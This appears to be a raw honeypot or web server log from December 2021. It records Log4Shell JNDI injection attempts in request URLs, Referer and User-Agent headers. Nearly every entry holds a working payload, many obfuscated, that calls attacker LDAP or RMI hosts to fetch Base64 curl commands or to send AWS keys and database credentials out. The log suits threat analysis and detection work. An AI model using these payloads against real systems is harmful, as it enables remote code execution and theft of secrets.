    URL: GET /?v=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F%7B%7Bcallback_Host%7D%7D%2
    Referer: -
    User Agent: log4j-scan

2021-12-16 45.77.27.93
    URL: GET /?v=%24%7Bjndi%3Armi%3A%2F%2F45.79.48.177.x2p7pn2l65sw477gl48rlgt5u2m42s8lo.interact.sh%7D
    Referer: -
    User Agent: log4j-scan

2021-12-16 45.77.27.93
    URL: GET /?v=%24%7Bjndi%3Aldap%3A%2F%2F45.79.48.177.x2p7pn2l65sw477gl48rlgt5u2m42s8lo.interact.sh%2
    Referer: -
    User Agent: log4j-scan

2021-12-16 178.239.198.142
    URL: GET /
    Referer: https://${jndi:ldap://x.y.168.9.24583o88p60h4x32r1271sf238mn7qg6l.interact.sh/unk13yf}
    User Agent: ${jndi:ldap://x.y.168.9.24583o88p60h4x32r1271sf238mn7qg6l.interact.sh/unk13yf}

2021-12-16 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-16 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-16 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-16 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-16 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:ldap://ca2ee5dcb2534c8ab658.y.psc4fuel.com/DkrMq.class}
    User Agent: Mozilla/5.0

2021-12-15 79.143.186.150
    URL: POST /
    Referer: https://google.com${jndi:ldap://653d173a4bd849f793a9.y.psc4fuel.com/D9IZY.class}
    User Agent: Mozilla/5.0

2021-12-15 194.5.73.6
    URL: GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-1e99066402be85445e5ffaf8106801aa_%24%7Bdate%3AYYYYMMdd
    Referer: ${jndi:ldap://divd-1e99066402be85445e5ffaf8106801aa_${date:YYYYMMddHHmmss}_https_Referer.log4jdns.x0
    User Agent: ${jndi:ldap://divd-1e99066402be85445e5ffaf8106801aa_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns

2021-12-15 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-15 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-15 195.54.160.149
    URL: GET /login
    Referer: http://a.b.c.e:80/dashboard
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-15 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-15 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-15 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-15 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-15 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:ldap://9f7d57e697c7480da10e.y.psc4fuel.com/UXkq0.class}
    User Agent: Mozilla/5.0

2021-12-14 92.63.197.53
    URL: GET /x=$%7B$%7B::-j%7Dnd$%7B::-i%7D:ldap://92.63.197.53:1389/or2q2y%7D?id=%24%7B%24%7B%3A%3A-j
    Referer: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/or2q2y}
    User Agent: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/or2q2y}

2021-12-14 92.63.197.53
    URL: GET /x=$%7B$%7B::-j%7Dnd$%7B::-i%7D:ldap://92.63.197.53:1389/or2q2y%7D?id=%24%7B%24%7B%3A%3A-j
    Referer: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/or2q2y}
    User Agent: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/or2q2y}

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/sshd-honeypot15}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/sshd-honeypot15}

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/sshd-honeypot15}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/sshd-honeypot15}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}fovilmpthhjrvsghjrwa.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}fovilmpthhjrvsghjrwa.test.dnsbin.net}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}fovilmpthhjrvsghjrwa.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}fovilmpthhjrvsghjrwa.test.dnsbin.net}

2021-12-14 195.54.160.149
    URL: GET /login
    Referer: http://a.b.c.e:80/dashboard
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-14 195.54.160.149
    URL: GET /login
    Referer: http://a.b.c.e:80/dashboard
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}yjgkymfyvuvhwotrsyic.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}yjgkymfyvuvhwotrsyic.test.dnsbin.net}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}yjgkymfyvuvhwotrsyic.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}yjgkymfyvuvhwotrsyic.test.dnsbin.net}

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/sshd-honeypot16}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/sshd-honeypot16}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}wkindvrrpkpjlbdusnjg.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}wkindvrrpkpjlbdusnjg.test.dnsbin.net}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}wkindvrrpkpjlbdusnjg.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}wkindvrrpkpjlbdusnjg.test.dnsbin.net}

2021-12-14 147.182.195.250
    URL: GET /$%7Bjndi:ldap://www.sshd-honeypot12.$%7Bsys:java.vendor%7D.@.$%7Bsys:java.version%7D.@.$%
    Referer: -
    User Agent: Mozilla/5.0

2021-12-14 147.182.195.250
    URL: GET /$%7Bjndi:ldap://sshd-honeypot12.$%7Bsys:java.vendor%7D.@.$%7Bsys:java.version%7D.@.$%7Bho
    Referer: -
    User Agent: Mozilla/4.0

2021-12-14 92.63.197.53
    URL: GET /x=$%7B$%7B::-j%7Dnd$%7B::-i%7D:ldap://92.63.197.53:1389/or2q2y%7D?id=%24%7B%24%7B%3A%3A-j
    Referer: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/or2q2y}
    User Agent: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/or2q2y}

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/sshd-honeypot13}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/sshd-honeypot13}

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/www.sshd-honeypot13}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/www.sshd-honeypot13

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}mbzuwvdueagowwetzxov.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}mbzuwvdueagowwetzxov.test.dnsbin.net}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}mbzuwvdueagowwetzxov.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}mbzuwvdueagowwetzxov.test.dnsbin.net}

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/sshd-honeypot18}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/sshd-honeypot18}

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/sshd-honeypot19}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/sshd-honeypot19}

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/www.sshd-honeypot26}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/www.sshd-honeypot26

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/www.sshd-honeypot26}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/www.sshd-honeypot26

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/sshd-honeypot26}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/sshd-honeypot26}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}cvcypkfzsgwgxmzinuku.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}cvcypkfzsgwgxmzinuku.test.dnsbin.net}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}cvcypkfzsgwgxmzinuku.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}cvcypkfzsgwgxmzinuku.test.dnsbin.net}

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/sshd-honeypot20}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/sshd-honeypot20}

2021-12-14 47.251.46.249
    URL: GET /shop/admin/ppcorg
    Referer: https://www.sshd-honeypot20/shop/admin/ppcorg
    User Agent: ${jndi:ldap://158.69.204.95:1389/Basic/Command/Base64/KGN1cmwgLVMgaHR0cHM6Ly93d3cuZWNvbi1qb2JzLmNvbS

2021-12-14 47.251.46.249
    URL: GET /shop/admin/ppcorg
    Referer: https://www.sshd-honeypot20/shop/admin/ppcorg
    User Agent: ${jndi:ldap://158.69.204.95:1389/Basic/Command/Base64/KGN1cmwgLVMgaHR0cHM6Ly93d3cuZWNvbi1qb2JzLmNvbS

2021-12-14 47.251.46.249
    URL: GET /shop/admin/ppcorg
    Referer: https://sshd-honeypot20/shop/admin/ppcorg
    User Agent: ${jndi:ldap://158.69.204.95:1389/Basic/Command/Base64/KGN1cmwgLVMgaHR0cHM6Ly93d3cuZWNvbi1qb2JzLmNvbS

2021-12-14 47.251.46.249
    URL: GET /shop/admin/ppcorg
    Referer: https://sshd-honeypot20/shop/admin/ppcorg
    User Agent: ${jndi:ldap://158.69.204.95:1389/Basic/Command/Base64/KGN1cmwgLVMgaHR0cHM6Ly93d3cuZWNvbi1qb2JzLmNvbS

2021-12-14 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-14 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}taziatglpzfcislrsrcy.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}taziatglpzfcislrsrcy.test.dnsbin.net}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}taziatglpzfcislrsrcy.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}taziatglpzfcislrsrcy.test.dnsbin.net}

2021-12-14 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-14 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-14 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-14 194.48.199.78
    URL: GET /
    Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://107.181.187.184:83/sshd-honeypot1}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://107.181.187.184:83/sshd-honeypot1}

2021-12-14 92.63.197.53
    URL: GET /x=$%7B$%7B::-j%7Dnd$%7B::-i%7D:ldap://92.63.197.53:1389/or2q2y%7D?id=%24%7B%24%7B%3A%3A-j
    Referer: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/or2q2y}
    User Agent: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/or2q2y}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.253:443/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.253:443/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.253:443/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.253:443/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.9:443/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.9:443/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.9:443/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.9:443/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.9:443/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.9:443/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.9:443/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.9:443/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.10:443/
    User Agent: ${$::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.10:443/
    User Agent: ${$lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.10:443/
    User Agent: ${$lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.169.10:443/
    User Agent: ${$lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160:

2021-12-14 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.168:443/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.168:443/
    User Agent: ${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.168:443/
    User Agent: ${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}

2021-12-14 45.146.164.160
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-14 45.146.164.160
    URL: GET /
    Referer: https://x.y.168.168:443/
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160

2021-12-14 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-14 103.232.137.155
    URL: GET /
    Referer: -
    User Agent: ${jndi:rmi://139.59.175.247:1099/ej5ytj}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}osxmkqmaeqkaocxcokvz.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}osxmkqmaeqkaocxcokvz.test.dnsbin.net}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}osxmkqmaeqkaocxcokvz.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}osxmkqmaeqkaocxcokvz.test.dnsbin.net}

2021-12-14 159.223.70.25
    URL: GET /
    Referer: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}fvqpftfkjxomgvfmahxo.test.dnsbin.net}
    User Agent: ${jndi:ldap://${env:AWS_ACCESS_KEY}.geocities.com/1}fvqpftfkjxomgvfmahxo.test.dnsbin.net}

2021-12-13 92.63.197.53
    URL: GET /x=$%7B$%7B::-j%7Dnd$%7B::-i%7D:ldap://92.63.197.53:1389/ptcrup_$%7Benv:DB_HOST%7D_$%7Benv
    Referer: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/ptcrup_${env:DB_HOST}_${env:DB_USERNAME}_${env:DB_PASSWO
    User Agent: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/ptcrup_${env:DB_HOST}_${env:DB_USERNAME}_${env:DB_PASSWO

2021-12-13 92.63.197.53
    URL: GET /x=$%7B$%7B::-j%7Dnd$%7B::-i%7D:ldap://92.63.197.53:1389/ptcrup_$%7Benv:DB_HOST%7D_$%7Benv
    Referer: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/ptcrup_${env:DB_HOST}_${env:DB_USERNAME}_${env:DB_PASSWO
    User Agent: ${${::-j}nd${::-i}:ldap://92.63.197.53:1389/ptcrup_${env:DB_HOST}_${env:DB_USERNAME}_${env:DB_PASSWO

2021-12-13 92.63.197.53
    URL: GET /
    Referer: ${jndi:ldap://log4shell.huntress.com:1389/7e3d979c-74e1-4928-aecd-1382c4843e0b}
    User Agent: ${jndi:ldap://log4shell.huntress.com:1389/7e3d979c-74e1-4928-aecd-1382c4843e0b}

2021-12-13 92.63.197.53
    URL: GET /
    Referer: ${jndi:ldap://log4shell.huntress.com:1389/7e3d979c-74e1-4928-aecd-1382c4843e0b}
